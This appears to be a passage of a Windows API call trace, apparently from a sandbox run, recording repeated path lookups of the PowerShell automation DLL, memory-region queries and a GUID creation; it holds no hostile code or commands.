	[0427.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.187] VirtualQuery (in: lpAddress=0x18b740, lpBuffer=0x18c600, dwLength=0x30 | out: lpBuffer=0x18c600*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.188] VirtualQuery (in: lpAddress=0x18b7d0, lpBuffer=0x18c690, dwLength=0x30 | out: lpBuffer=0x18c690*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.189] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.191] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.192] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.192] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.192] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.193] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.193] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.193] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.193] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.193] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.193] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.194] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.194] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] VirtualQuery (in: lpAddress=0x18bb80, lpBuffer=0x18ca40, dwLength=0x30 | out: lpBuffer=0x18ca40*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.195] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xd63f7096, Data2=0xd815, Data3=0x4eb3, Data4=([0]=0x87, [1]=0x7, [2]=0xbd, [3]=0x8, [4]=0xcb, [5]=0x3c, [6]=0x2e, [7]=0xab))) returned 0x0
	[0427.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
